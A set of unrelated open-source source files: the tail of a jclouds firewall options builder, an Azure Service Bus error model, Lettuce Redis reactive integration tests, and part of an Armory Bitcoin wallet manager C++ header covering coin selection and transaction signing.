   public FirewallOptions addSourceTag(String sourceTag) {
      this.sourceTags.add(sourceTag);
      return this;
   }
   /**
    * Replaces all previously added source tags.
    *
    * @see org.jclouds.googlecomputeengine.domain.Firewall#sourceTags()
    */
   public FirewallOptions sourceTags(Iterable<String> sourceTags) {
      this.sourceTags = ImmutableList.builder();
      this.sourceTags.addAll(sourceTags);
      return this;
   }
   /**
    * @see org.jclouds.googlecomputeengine.domain.Firewall#targetTags()
    */
   public List<String> targetTags() {
      return targetTags.build();
   }
   /**
    * @see org.jclouds.googlecomputeengine.domain.Firewall#targetTags()
    */
   public FirewallOptions addTargetTag(String targetTag) {
      this.targetTags.add(targetTag);
      return this;
   }
   /**
    * Replaces all previously added target tags.
    * NOTE(review): takes List while the other bulk setters take Iterable -
    * widening would be source-compatible but not binary-compatible, so kept.
    *
    * @see org.jclouds.googlecomputeengine.domain.Firewall#targetTags()
    */
   public FirewallOptions targetTags(List<String> targetTags) {
      this.targetTags = ImmutableList.builder();
      this.targetTags.addAll(targetTags);
      return this;
   }
}
| 1,766 |
// Copyright (c) Microsoft Corporation. All rights reserved.
// Licensed under the MIT License.
// Code generated by Microsoft (R) AutoRest Code Generator.
package com.azure.messaging.servicebus.implementation.models;
import com.azure.core.annotation.Fluent;
import com.fasterxml.jackson.annotation.JsonProperty;
import com.fasterxml.jackson.dataformat.xml.annotation.JacksonXmlRootElement;
/** The ServiceBusManagementError model. */
@JacksonXmlRootElement(localName = "ServiceBusManagementError")
@Fluent
public final class ServiceBusManagementError {
    // Numeric error code, bound to the "Code" XML element.
    @JsonProperty(value = "Code")
    private Integer code;

    // Human-readable error text, bound to the "Detail" XML element.
    @JsonProperty(value = "Detail")
    private String detail;

    /**
     * Returns the service error code.
     *
     * @return the code value.
     */
    public Integer getCode() {
        return code;
    }

    /**
     * Updates the service error code.
     *
     * @param value the code value to set.
     * @return the ServiceBusManagementError object itself.
     */
    public ServiceBusManagementError setCode(Integer value) {
        code = value;
        return this;
    }

    /**
     * Returns the service error message.
     *
     * @return the detail value.
     */
    public String getDetail() {
        return detail;
    }

    /**
     * Updates the service error message.
     *
     * @param value the detail value to set.
     * @return the ServiceBusManagementError object itself.
     */
    public ServiceBusManagementError setDetail(String value) {
        detail = value;
        return this;
    }
}
| 613 |
/*
* Copyright 2011-2021 the original author or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package io.lettuce.core;
import static io.lettuce.core.ClientOptions.DisconnectedBehavior.REJECT_COMMANDS;
import static io.lettuce.core.ScriptOutputType.INTEGER;
import static org.assertj.core.api.Assertions.assertThat;
import java.time.Duration;
import java.util.ArrayList;
import java.util.List;
import java.util.concurrent.CountDownLatch;
import java.util.concurrent.TimeUnit;
import javax.enterprise.inject.New;
import javax.inject.Inject;
import org.junit.jupiter.api.BeforeEach;
import org.junit.jupiter.api.Test;
import org.junit.jupiter.api.TestInstance;
import org.junit.jupiter.api.extension.ExtendWith;
import org.reactivestreams.Subscriber;
import org.reactivestreams.Subscription;
import reactor.core.publisher.Flux;
import reactor.core.publisher.Mono;
import reactor.test.StepVerifier;
import io.lettuce.core.api.StatefulRedisConnection;
import io.lettuce.core.api.reactive.RedisReactiveCommands;
import io.lettuce.core.api.sync.RedisCommands;
import io.lettuce.test.Delay;
import io.lettuce.test.LettuceExtension;
import io.lettuce.test.Wait;
import io.lettuce.test.WithPassword;
import io.lettuce.test.condition.EnabledOnCommand;
/**
* @author <NAME>
* @author <NAME>
* @author <NAME>
*/
@ExtendWith(LettuceExtension.class)
@TestInstance(TestInstance.Lifecycle.PER_CLASS)
class ReactiveConnectionIntegrationTests extends TestSupport {
    // Shared fixture: one injected connection, with sync and reactive facades
    // over the same underlying channel.
    private final StatefulRedisConnection<String, String> connection;
    private final RedisCommands<String, String> redis;
    private final RedisReactiveCommands<String, String> reactive;
    @Inject
    ReactiveConnectionIntegrationTests(StatefulRedisConnection<String, String> connection) {
        this.connection = connection;
        this.redis = connection.sync();
        this.reactive = connection.reactive();
    }
    // Start every test from an empty keyspace.
    @BeforeEach
    void setUp() {
        this.connection.async().flushall();
    }
    // Reactive commands are deferred: SET must not reach the server until the
    // Mono is subscribed.
    @Test
    void doNotFireCommandUntilObservation() {
        RedisReactiveCommands<String, String> reactive = connection.reactive();
        Mono<String> set = reactive.set(key, value);
        Delay.delay(Duration.ofMillis(50));
        assertThat(redis.get(key)).isNull();
        set.subscribe();
        Wait.untilEquals(value, () -> redis.get(key)).waitOrTimeout();
        assertThat(redis.get(key)).isEqualTo(value);
    }
    // Subscribing executes the command and emits its reply ("OK" for SET).
    @Test
    void fireCommandAfterObserve() {
        StepVerifier.create(reactive.set(key, value)).expectNext("OK").verifyComplete();
        assertThat(redis.get(key)).isEqualTo(value);
    }
    @Test
    void isOpen() {
        assertThat(reactive.isOpen()).isTrue();
    }
    @Test
    void getStatefulConnection() {
        assertThat(reactive.getStatefulConnection()).isSameAs(connection);
    }
    // reset() discards a SET that is still queued behind CLIENT PAUSE, so its
    // subscriber must receive no signal at all. Uses a @New connection so the
    // pause does not affect other tests.
    @Test
    @Inject
    void testCancelCommand(@New StatefulRedisConnection<String, String> connection) {
        RedisReactiveCommands<String, String> reactive = connection.reactive();
        List<Object> result = new ArrayList<>();
        reactive.clientPause(2000).subscribe();
        Delay.delay(Duration.ofMillis(50));
        reactive.set(key, value).subscribe(new CompletionSubscriber(result));
        Delay.delay(Duration.ofMillis(50));
        reactive.reset();
        assertThat(result).isEmpty();
    }
    @Test
    void testEcho() {
        StepVerifier.create(reactive.echo("echo")).expectNext("echo").verifyComplete();
    }
    // Three subscriptions to the same paused Mono, then reset(): none of the
    // subscribers may have received a signal.
    @Test
    @Inject
    void testMonoMultiCancel(@New StatefulRedisConnection<String, String> connection) {
        RedisReactiveCommands<String, String> reactive = connection.reactive();
        List<Object> result = new ArrayList<>();
        reactive.clientPause(1000).subscribe();
        Delay.delay(Duration.ofMillis(50));
        Mono<String> set = reactive.set(key, value);
        set.subscribe(new CompletionSubscriber(result));
        set.subscribe(new CompletionSubscriber(result));
        set.subscribe(new CompletionSubscriber(result));
        Delay.delay(Duration.ofMillis(50));
        reactive.reset();
        assertThat(result).isEmpty();
    }
    // Same cancellation check as above but for a Flux-returning command (MGET).
    @Test
    @Inject
    void testFluxCancel(@New StatefulRedisConnection<String, String> connection) {
        RedisReactiveCommands<String, String> reactive = connection.reactive();
        List<Object> result = new ArrayList<>();
        reactive.clientPause(1000).subscribe();
        Delay.delay(Duration.ofMillis(100));
        Flux<KeyValue<String, String>> set = reactive.mget(key, value);
        set.subscribe(new CompletionSubscriber(result));
        set.subscribe(new CompletionSubscriber(result));
        set.subscribe(new CompletionSubscriber(result));
        Delay.delay(Duration.ofMillis(100));
        reactive.reset();
        assertThat(result).isEmpty();
    }
    // Each subscription to the INCR Mono re-executes the command:
    // SET key 1 plus three INCR subscriptions yields "4".
    @Test
    void multiSubscribe() throws Exception {
        CountDownLatch latch = new CountDownLatch(4);
        reactive.set(key, "1").subscribe(s -> latch.countDown());
        Mono<Long> incr = reactive.incr(key);
        incr.subscribe(s -> latch.countDown());
        incr.subscribe(s -> latch.countDown());
        incr.subscribe(s -> latch.countDown());
        latch.await();
        Wait.untilEquals("4", () -> redis.get(key)).waitOrTimeout();
        assertThat(redis.get(key)).isEqualTo("4");
    }
    // Commands issued between MULTI and EXEC take effect only after EXEC:
    // SET "1" + INCR inside the transaction leaves "2".
    @Test
    @Inject
    void transactional(RedisClient client) throws Exception {
        final CountDownLatch sync = new CountDownLatch(1);
        RedisReactiveCommands<String, String> reactive = client.connect().reactive();
        reactive.multi().subscribe(multiResponse -> {
            reactive.set(key, "1").subscribe();
            reactive.incr(key).subscribe(getResponse -> {
                sync.countDown();
            });
            reactive.exec().subscribe();
        });
        sync.await(5, TimeUnit.SECONDS);
        String result = redis.get(key);
        assertThat(result).isEqualTo("2");
        reactive.getStatefulConnection().close();
    }
    // AUTH with a wrong password must error once authentication is enabled;
    // finally-block restores the unauthenticated state for other tests.
    @Test
    void auth() {
        WithPassword.enableAuthentication(this.connection.sync());
        try {
            StepVerifier.create(reactive.auth("error")).expectError().verify();
        } finally {
            WithPassword.disableAuthentication(this.connection.sync());
        }
    }
    // Username/password AUTH (Redis ACL): succeeds for a valid user/password
    // pair, errors for a wrong password.
    @Test
    @EnabledOnCommand("ACL")
    void authWithUsername() {
        try {
            StepVerifier.create(reactive.auth(username, "error")).expectNext("OK").verifyComplete();
            WithPassword.enableAuthentication(this.connection.sync());
            StepVerifier.create(reactive.auth(username, "error")).expectError().verify();
            StepVerifier.create(reactive.auth(aclUsername, aclPasswd)).expectNext("OK").verifyComplete();
            StepVerifier.create(reactive.auth(aclUsername, "error")).expectError().verify();
        } finally {
            WithPassword.disableAuthentication(this.connection.sync());
        }
    }
    // A subscriber that throws from onComplete must not poison the connection:
    // a subsequent GET on the same connection still works.
    @Test
    void subscriberCompletingWithExceptionShouldBeHandledSafely() {
        StepVerifier.create(Flux.concat(reactive.set("keyA", "valueA"), reactive.set("keyB", "valueB"))).expectNextCount(2)
                .verifyComplete();
        reactive.get("keyA").subscribe(createSubscriberWithExceptionOnComplete());
        reactive.get("keyA").subscribe(createSubscriberWithExceptionOnComplete());
        StepVerifier.create(reactive.get("keyB")).expectNext("valueB").verifyComplete();
    }
    // With REJECT_COMMANDS and auto-reconnect off, commands on a closed
    // connection fail fast with a descriptive RedisException.
    @Test
    @Inject
    void subscribeWithDisconnectedClient(RedisClient client) {
        client.setOptions(ClientOptions.builder().disconnectedBehavior(REJECT_COMMANDS).autoReconnect(false).build());
        StatefulRedisConnection<String, String> connection = client.connect();
        connection.async().quit();
        Wait.untilTrue(() -> !connection.isOpen()).waitOrTimeout();
        StepVerifier.create(connection.reactive().ping()).consumeErrorWith(throwable -> {
            assertThat(throwable).isInstanceOf(RedisException.class)
                    .hasMessageContaining("not connected. Commands are rejected");
        }).verify();
        connection.close();
    }
    // With publishOnScheduler enabled, 1000 blocking EVAL round trips must
    // each emit a value (block() never observes null).
    @Test
    @Inject
    void publishOnSchedulerTest(RedisClient client) {
        client.setOptions(ClientOptions.builder().publishOnScheduler(true).build());
        RedisReactiveCommands<String, String> reactive = client.connect().reactive();
        int counter = 0;
        for (int i = 0; i < 1000; i++) {
            if (reactive.eval("return 1", INTEGER).next().block() == null) {
                counter++;
            }
        }
        assertThat(counter).isZero();
        reactive.getStatefulConnection().close();
    }
    // Subscriber that requests eagerly and throws from onComplete; used to
    // verify connection robustness against misbehaving consumers.
    private static Subscriber<String> createSubscriberWithExceptionOnComplete() {
        return new Subscriber<String>() {
            @Override
            public void onSubscribe(Subscription s) {
                s.request(1000);
            }
            @Override
            public void onComplete() {
                throw new RuntimeException("throwing something");
            }
            @Override
            public void onError(Throwable e) {
            }
            @Override
            public void onNext(String s) {
            }
        };
    }
    // Records every signal it receives (values, errors, and a "completed"
    // marker) into the supplied list, so tests can assert "nothing happened".
    private static class CompletionSubscriber implements Subscriber<Object> {
        private final List<Object> result;
        CompletionSubscriber(List<Object> result) {
            this.result = result;
        }
        @Override
        public void onSubscribe(Subscription s) {
            s.request(1000);
        }
        @Override
        public void onComplete() {
            result.add("completed");
        }
        @Override
        public void onError(Throwable e) {
            result.add(e);
        }
        @Override
        public void onNext(Object o) {
            result.add(o);
        }
    }
}
| 4,142 |
505 | <gh_stars>100-1000
////////////////////////////////////////////////////////////////////////////////
// //
// Copyright (C) 2016, goatpig //
// Distributed under the MIT license //
// See LICENSE-MIT or https://opensource.org/licenses/MIT //
// //
////////////////////////////////////////////////////////////////////////////////
#ifndef _WALLET_MANAGER_H
#define _WALLET_MANAGER_H
using namespace std;
#include <mutex>
#include <memory>
#include <string>
#include <map>
#include <iostream>
#include "log.h"
#include "Wallets.h"
#include "SwigClient.h"
#include "Signer.h"
#include "BlockDataManagerConfig.h"
#include "CoinSelection.h"
#include "Script.h"
//address flavors exposed to the SWIG/Python layer; mapped from the
//wallet-side AddressEntryType values in WalletContainer::getAddrTypeForIndex
enum AddressType
{
   AddressType_P2PKH,
   AddressType_P2SH_P2PK,
   AddressType_P2SH_P2WPKH,
   AddressType_Multisig
};
class WalletContainer;
////////////////////////////////////////////////////////////////////////////////
//stateful wrapper around CoinSelection: accumulates recipients, runs utxo
//selection against either a wallet or a lockbox, and exposes the resulting
//fee/size figures to the Python bindings
struct CoinSelectionInstance
{
private:
   CoinSelection cs_;
   //recipients keyed by caller-assigned id (see addRecipient/updateRecipient)
   map<unsigned, shared_ptr<ScriptRecipient> > recipients_;
   //result of the last selectUTXOs/updateState run
   UtxoSelection selection_;
   WalletContainer* const walletContainer_;
   vector<UTXO> state_utxoVec_;
   uint64_t spendableBalance_;
private:
   static void decorateUTXOs(WalletContainer* const, vector<UTXO>&);
   //lambdas that fetch spendable utxos for a target value, for wallet and
   //lockbox sources respectively
   static function<vector<UTXO>(uint64_t)> getFetchLambdaFromWalletContainer(
      WalletContainer* const walletContainer);
   static function<vector<UTXO>(uint64_t)> getFetchLambdaFromLockbox(
      SwigClient::Lockbox* const, unsigned M, unsigned N);
   uint64_t getSpendVal(void) const;
   void checkSpendVal(uint64_t) const;
   void addRecipient(unsigned, const BinaryData&, uint64_t);
   static shared_ptr<ScriptRecipient> createRecipient(const BinaryData&, uint64_t);
   void selectUTXOs(vector<UTXO>&, uint64_t fee, float fee_byte, unsigned flags);
public:
   CoinSelectionInstance(WalletContainer* const walletContainer,
      const vector<AddressBookEntry>& addrBook);
   CoinSelectionInstance(SwigClient::Lockbox* const,
      unsigned M, unsigned N,
      unsigned blockHeight, uint64_t balance);
   //returns the id assigned to the new recipient
   unsigned addRecipient(const BinaryData&, uint64_t);
   void updateRecipient(unsigned, const BinaryData&, uint64_t);
   void updateOpReturnRecipient(unsigned, const BinaryData&);
   void removeRecipient(unsigned);
   void resetRecipients(void);
   void selectUTXOs(uint64_t fee, float fee_byte, unsigned flags);
   //run selection over a caller-supplied utxo list instead of fetching
   void processCustomUtxoList(
      const vector<BinaryData>& serializedUtxos,
      uint64_t fee, float fee_byte,
      unsigned flags);
   void updateState(uint64_t fee, float fee_byte, unsigned flags);
   uint64_t getFeeForMaxValUtxoVector(const vector<BinaryData>& serializedUtxos, float fee_byte);
   uint64_t getFeeForMaxVal(float fee_byte);
   //accessors over the last computed selection
   size_t getSizeEstimate(void) const { return selection_.size_; }
   vector<UTXO> getUtxoSelection(void) const { return selection_.utxoVec_; }
   uint64_t getFlatFee(void) const { return selection_.fee_; }
   float getFeeByte(void) const { return selection_.fee_byte_; }
   bool isSW(void) const { return selection_.witnessSize_ != 0; }
   void rethrow(void) { cs_.rethrow(); }
};
////////////////////////////////////////////////////////////////////////////////
//pairs an armory-side AssetWallet with its DB-side SwigClient::BtcWallet view
//and caches per-address balances/tx counts for the Python bindings
class WalletContainer
{
   friend class WalletManager;
   friend class PythonSigner;
   friend struct CoinSelectionInstance;

private:
   const string id_;
   //local wallet object; may exist without a DB connection
   shared_ptr<AssetWallet> wallet_;
   //DB-side view; nullptr until registered with the BDV
   shared_ptr<SwigClient::BtcWallet> swigWallet_;
   //lazy accessor to the BlockDataViewer owned by WalletManager
   function<SwigClient::BlockDataViewer&(void)> getBDVlambda_;

   //per-address caches: [full, spendable, unconfirmed] balances and tx counts
   map<BinaryData, vector<uint64_t> > balanceMap_;
   map<BinaryData, uint32_t> countMap_;

   uint64_t totalBalance_ = 0;
   uint64_t spendableBalance_ = 0;
   uint64_t unconfirmedBalance_ = 0;

private:
   WalletContainer(const string& id,
      function<SwigClient::BlockDataViewer&(void)> bdvLbd) :
      id_(id), getBDVlambda_(bdvLbd)
   {}

   //drop all cached balance/count state
   void reset(void)
   {
      totalBalance_ = 0;
      spendableBalance_ = 0;
      unconfirmedBalance_ = 0;

      balanceMap_.clear();
      countMap_.clear();
   }

   //single conversion point from wallet-side AddressEntryType to the
   //SWIG-exposed AddressType; previously duplicated verbatim in both
   //getAddrTypeForIndex overloads
   static AddressType convertAddressEntryType(AddressEntryType addrType)
   {
      switch (addrType)
      {
      case AddressEntryType_P2PKH:
         return AddressType_P2PKH;

      case AddressEntryType_Nested_Multisig:
      case AddressEntryType_Nested_P2WSH:
         return AddressType_Multisig;

      case AddressEntryType_Nested_P2WPKH:
         return AddressType_P2SH_P2WPKH;

      case AddressEntryType_Nested_P2PK:
         return AddressType_P2SH_P2PK;

      default:
         throw WalletException("invalid address type");
      }
   }

protected:
   //need this for unit test, but can't have it exposed to SWIG for backwards
   //compatiblity with 2.x (because of the shared_ptr return type)
   virtual shared_ptr<AssetWallet> getWalletPtr(void) const
   {
      return wallet_;
   }

public:
   void registerWithBDV(bool isNew);

   //fetch total/spendable/unconfirmed balances from the DB and cache them
   vector<uint64_t> getBalancesAndCount(
      uint32_t topBlockHeight, bool IGNOREZC)
   {
      auto&& balVec =
         swigWallet_->getBalancesAndCount(topBlockHeight, IGNOREZC);

      totalBalance_ = balVec[0];
      spendableBalance_ = balVec[1];
      unconfirmedBalance_ = balVec[2];

      return balVec;
   }

   vector<UTXO> getSpendableTxOutListForValue(
      uint64_t val = UINT64_MAX)
   {
      return swigWallet_->getSpendableTxOutListForValue(val);
   }

   vector<UTXO> getSpendableZCList(void)
   {
      return swigWallet_->getSpendableZCList();
   }

   vector<UTXO> getRBFTxOutList(void)
   {
      return swigWallet_->getRBFTxOutList();
   }

   //refresh countMap_ from the DB; also realigns each asset's address entry
   //type with the hash type seen on chain, persisting the wallet if any
   //entry changed
   const map<BinaryData, uint32_t>& getAddrTxnCountsFromDB(void)
   {
      bool updateWallet = false;

      auto&& countmap = swigWallet_->getAddrTxnCountsFromDB();

      for (const auto& count : countmap)
      {
         if (count.first.getSize() == 0)
            continue;

         //save count
         countMap_[count.first] = count.second;

         //fetch the asset in wallet
         auto assetIndex = wallet_->getAssetIndexForAddr(count.first);
         auto asset = wallet_->getAssetForIndex(assetIndex);
         auto hashType = asset->getAddressTypeForHash(
            count.first.getSliceRef(1, count.first.getSize() - 1));
         updateWallet |= asset->setAddressEntryType(hashType);
      }

      if (updateWallet)
         wallet_->update();

      return countMap_;
   }

   //refresh balanceMap_ from the DB
   const map<BinaryData, vector<uint64_t> >& getAddrBalancesFromDB(void)
   {
      auto&& balancemap = swigWallet_->getAddrBalancesFromDB();

      for (const auto& balVec : balancemap)
      {
         if (balVec.first.getSize() == 0)
            continue;

         //save balance
         balanceMap_[balVec.first] = balVec.second;
      }

      return balanceMap_;
   }

   vector<LedgerEntryData> getHistoryPage(uint32_t id)
   {
      return swigWallet_->getHistoryPage(id);
   }

   LedgerEntryData getLedgerEntryForTxHash(
      const BinaryData& txhash)
   {
      return swigWallet_->getLedgerEntryForTxHash(txhash);
   }

   SwigClient::ScrAddrObj getScrAddrObjByKey(const BinaryData& scrAddr,
      uint64_t full, uint64_t spendable, uint64_t unconf, uint32_t count)
   {
      return swigWallet_->getScrAddrObjByKey(
         scrAddr, full, spendable, unconf, count);
   }

   //empty book when the wallet was never registered with the DB
   vector<AddressBookEntry> createAddressBook(void) const
   {
      if (swigWallet_ == nullptr)
         return vector<AddressBookEntry>();

      return swigWallet_->createAddressBook();
   }

   BinaryData getNestedSWAddrForIndex(unsigned chainIndex)
   {
      return wallet_->getNestedSWAddrForIndex(chainIndex);
   }

   BinaryData getNestedP2PKAddrForIndex(unsigned chainIndex)
   {
      return wallet_->getNestedP2PKAddrForIndex(chainIndex);
   }

   BinaryData getP2PKHAddrForIndex(unsigned chainIndex)
   {
      return wallet_->getP2PKHAddrForIndex(chainIndex);
   }

   void extendAddressChain(unsigned count)
   {
      wallet_->extendChain(count);
   }

   bool extendAddressChainTo(unsigned count)
   {
      return wallet_->extendChainTo(count);
   }

   int getLastComputedIndex(void) const
   {
      return wallet_->getLastComputedIndex();
   }

   bool hasScrAddr(const BinaryData& scrAddr)
   {
      return wallet_->hasScrAddr(scrAddr);
   }

   int getAssetIndexForAddr(const BinaryData& scrAddr)
   {
      return wallet_->getAssetIndexForAddr(scrAddr);
   }

   const BinaryData& getP2SHScriptForHash(const BinaryData& script)
   {
      return wallet_->getP2SHScriptForHash(script);
   }

   AddressType getAddrTypeForIndex(int index)
   {
      return convertAddressEntryType(wallet_->getAddrTypeForIndex(index));
   }

   AddressType getAddrTypeForIndex_WithScript(int index, const BinaryData& h160)
   {
      return convertAddressEntryType(wallet_->getAddrTypeForIndex(index, h160));
   }

   //build a ScrAddrObj from the cached balances/counts; falls back to the
   //offline flavor when there is no DB connection
   SwigClient::ScrAddrObj getAddrObjByIndex(int index)
   {
      auto addrPtr = wallet_->getAddressEntryForIndex(index);

      uint64_t full = 0, spend = 0, unconf = 0;
      auto balanceIter = balanceMap_.find(addrPtr->getPrefixedHash());
      if (balanceIter != balanceMap_.end())
      {
         full = balanceIter->second[0];
         spend = balanceIter->second[1];
         unconf = balanceIter->second[2];
      }

      uint32_t count = 0;
      auto countIter = countMap_.find(addrPtr->getPrefixedHash());
      if (countIter != countMap_.end())
         count = countIter->second;

      if (swigWallet_ != nullptr)
      {
         SwigClient::ScrAddrObj saObj(
            swigWallet_.get(), addrPtr->getAddress(), index,
            full, spend, unconf, count);
         saObj.addrHash_ = addrPtr->getPrefixedHash();

         return saObj;
      }
      else
      {
         SwigClient::ScrAddrObj saObj(
            addrPtr->getAddress(), addrPtr->getPrefixedHash(), index);

         return saObj;
      }
   }

   SwigClient::ScrAddrObj getImportAddrObjByIndex(int index)
   {
      auto importIndex = AssetWallet::convertToImportIndex(index);
      return getAddrObjByIndex(importIndex);
   }

   int detectHighestUsedIndex(void);

   CoinSelectionInstance getCoinSelectionInstance(void)
   {
      auto&& addrBookVector = createAddressBook();
      return CoinSelectionInstance(this, addrBookVector);
   }

   unsigned getTopBlock(void);

   bool setImport(int importID, const SecureBinaryData& pubkey);
   int convertToImportIndex(int);
   int convertFromImportIndex(int);
   void removeAddressBulk(const vector<BinaryData>&);
   vector<BinaryData> getScriptHashVectorForIndex(int) const;
};
class ResolverFeed_PythonWalletSingle;
////////////////////////////////////////////////////////////////////////////////
//Python-facing transaction signer: wraps a Signer plus a resolver feed that
//pulls private keys from the bound wallet via the pure virtual getters below
class PythonSigner
{
   friend class ResolverFeed_PythonWalletSingle;

private:
   shared_ptr<AssetWallet> walletPtr_;

protected:
   unique_ptr<Signer> signer_;
   shared_ptr<ResolverFeed_PythonWalletSingle> feedPtr_;

public:
   //throws WalletException when the container does not hold a single wallet
   PythonSigner(WalletContainer& wltContainer)
   {
      walletPtr_ = wltContainer.wallet_;
      signer_ = make_unique<Signer>();
      signer_->setFlags(SCRIPT_VERIFY_SEGWIT);

      //create feed
      auto walletSingle = dynamic_pointer_cast<AssetWallet_Single>(walletPtr_);
      if (walletSingle == nullptr)
         throw WalletException("unexpected wallet type");

      feedPtr_ = make_shared<ResolverFeed_PythonWalletSingle>(
         walletSingle, this);
   }

   //registers the outpoint described by the arguments as a spender
   virtual void addSpender(
      uint64_t value,
      uint32_t height, uint16_t txindex, uint16_t outputIndex,
      const BinaryData& txHash, const BinaryData& script, unsigned sequence)
   {
      UTXO utxo(value, height, txindex, outputIndex, txHash, script);

      //set spenders
      auto spenderPtr = make_shared<ScriptSpender>(utxo, feedPtr_);
      spenderPtr->setSequence(sequence);

      signer_->addSpender(spenderPtr);
   }

   //builds the recipient matching the output script's type; throws
   //WalletException for unrecognized script types
   void addRecipient(const BinaryData& script, uint64_t value)
   {
      auto txOutRef = BtcUtils::getTxOutScrAddrNoCopy(script);

      auto p2pkh_prefix =
         SCRIPT_PREFIX(BlockDataManagerConfig::getPubkeyHashPrefix());
      auto p2sh_prefix =
         SCRIPT_PREFIX(BlockDataManagerConfig::getScriptHashPrefix());

      shared_ptr<ScriptRecipient> recipient;
      if (txOutRef.type_ == p2pkh_prefix)
         recipient = make_shared<Recipient_P2PKH>(txOutRef.scriptRef_, value);
      else if (txOutRef.type_ == p2sh_prefix)
         recipient = make_shared<Recipient_P2SH>(txOutRef.scriptRef_, value);
      else if (txOutRef.type_ == SCRIPT_PREFIX_OPRETURN)
         recipient = make_shared<Recipient_OPRETURN>(txOutRef.scriptRef_);
      else if (txOutRef.type_ == SCRIPT_PREFIX_P2WSH ||
         txOutRef.type_ == SCRIPT_PREFIX_P2WPKH)
         recipient = make_shared<Recipient_Bech32>(txOutRef.scriptRef_, value);
      else
         throw WalletException("unexpected output type");

      signer_->addRecipient(recipient);
   }

   //signs and verifies in one pass; throws on verification failure
   void signTx(void)
   {
      signer_->sign();
      if (!signer_->verify())
         throw runtime_error("failed signature");
   }

   void setLockTime(unsigned locktime)
   {
      signer_->setLockTime(locktime);
   }

   BinaryData getSignedTx(void)
   {
      BinaryData finalTx(signer_->serialize());
      return finalTx;
   }

   const BinaryData& getSigForInputIndex(unsigned id) const
   {
      return signer_->getSigForInputIndex(id);
   }

   BinaryData getWitnessDataForInputIndex(unsigned id)
   {
      return BinaryData(signer_->getWitnessData(id));
   }

   //true when input id spends a segwit output
   bool isInputSW(unsigned id) const
   {
      return signer_->isInputSW(id);
   }

   //misspelled legacy name kept for backwards compatibility with existing
   //bindings; prefer isInputSW
   bool isInptuSW(unsigned id) const
   {
      return isInputSW(id);
   }

   BinaryData serializeSignedTx() const
   {
      return signer_->serialize();
   }

   BinaryData serializeState(void) const
   {
      return signer_->serializeState();
   }

   virtual ~PythonSigner(void) = 0;
   //key lookups implemented on the Python side
   virtual const SecureBinaryData& getPrivateKeyForIndex(unsigned) = 0;
   virtual const SecureBinaryData& getPrivateKeyForImportIndex(unsigned) = 0;
};
////////////////////////////////////////////////////////////////////////////////
class PythonSigner_BCH : public PythonSigner
{
public:
PythonSigner_BCH(WalletContainer& wltContainer) :
PythonSigner(wltContainer)
{
signer_ = make_unique<Signer_BCH>();
}
void addSpender(
uint64_t value,
uint32_t height, uint16_t txindex, uint16_t outputIndex,
const BinaryData& txHash, const BinaryData& script, unsigned sequence)
{
UTXO utxo(value, height, txindex, outputIndex, txHash, script);
//set spenders
auto spenderPtr = make_shared<ScriptSpender_BCH>(utxo, feedPtr_);
spenderPtr->setSequence(sequence);
signer_->addSpender(spenderPtr);
}
};
class ResolverFeed_Universal;
////////////////////////////////////////////////////////////////////////////////
//signer driven entirely through serialized state and caller-supplied key
//lookups (getPublicDataForKey/getPrivDataForKey, implemented on the Python
//side); does not require a WalletContainer
class UniversalSigner
{
private:
   unique_ptr<Signer> signer_;
   shared_ptr<ResolverFeed_Universal> feedPtr_;

public:
   UniversalSigner(const string& signerType);
   virtual ~UniversalSigner(void) = 0;

   //merge a serialized signer state into this signer
   void updateSignerState(const BinaryData& state)
   {
      signer_->deserializeState(state);
   }

   //supply the utxo backing outpoint (hash, txoId)
   void populateUtxo(const BinaryData& hash, unsigned txoId,
      uint64_t value, const BinaryData& script)
   {
      UTXO utxo(value, UINT32_MAX, UINT32_MAX, txoId, hash, script);
      signer_->populateUtxo(utxo);
   }

   void signTx(void)
   {
      signer_->sign();
   }

   void setLockTime(unsigned locktime)
   {
      signer_->setLockTime(locktime);
   }

   void setVersion(unsigned version)
   {
      signer_->setVersion(version);
   }

   void addSpenderByOutpoint(
      const BinaryData& hash, unsigned index, unsigned sequence, uint64_t value)
   {
      signer_->addSpender_ByOutpoint(hash, index, sequence, value);
   }

   void addRecipient(uint64_t value, const BinaryData& script)
   {
      auto recipient = make_shared<Recipient_Universal>(script, value);
      signer_->addRecipient(recipient);
   }

   BinaryData getSignedTx(void)
   {
      BinaryData finalTx(signer_->serialize());
      return finalTx;
   }

   const BinaryData& getSigForInputIndex(unsigned id) const
   {
      return signer_->getSigForInputIndex(id);
   }

   BinaryData getWitnessDataForInputIndex(unsigned id)
   {
      return BinaryData(signer_->getWitnessData(id));
   }

   //true when input id spends a segwit output
   bool isInputSW(unsigned id) const
   {
      return signer_->isInputSW(id);
   }

   //misspelled legacy name kept for backwards compatibility with existing
   //bindings; prefer isInputSW
   bool isInptuSW(unsigned id) const
   {
      return isInputSW(id);
   }

   BinaryData serializeState(void) const
   {
      return signer_->serializeState();
   }

   void deserializeState(const BinaryData& state)
   {
      signer_->deserializeState(state);
   }

   TxEvalState getSignedState(void) const
   {
      return signer_->evaluateSignedState();
   }

   BinaryData serializeSignedTx() const
   {
      return signer_->serialize();
   }

   //data lookups implemented on the Python side
   virtual string getPublicDataForKey(const string&) = 0;
   virtual const SecureBinaryData& getPrivDataForKey(const string&) = 0;
};
////////////////////////////////////////////////////////////////////////////////
class PythonVerifier
{
private:
unique_ptr<Signer> signer_;
public:
PythonVerifier()
{
signer_ = make_unique<Signer>();
signer_->setFlags(SCRIPT_VERIFY_SEGWIT);
}
bool verifySignedTx(const BinaryData& rawTx,
const map<BinaryData, map<unsigned, BinaryData> >& utxoMap)
{
return signer_->verifyRawTx(rawTx, utxoMap);
}
};
////////////////////////////////////////////////////////////////////////////////
class PythonVerifier_BCH
{
private:
unique_ptr<Signer_BCH> signer_;
public:
PythonVerifier_BCH()
{
signer_ = make_unique<Signer_BCH>();
}
bool verifySignedTx(const BinaryData& rawTx,
const map<BinaryData, map<unsigned, BinaryData> >& utxoMap)
{
return signer_->verifyRawTx(rawTx, utxoMap);
}
};
////////////////////////////////////////////////////////////////////////////////
//resolver feed that routes private key requests back to the PythonSigner,
//which implements the actual lookups on the Python side
class ResolverFeed_PythonWalletSingle : public ResolvedFeed_AssetWalletSingle
{
private:
   PythonSigner* signerPtr_ = nullptr;
public:
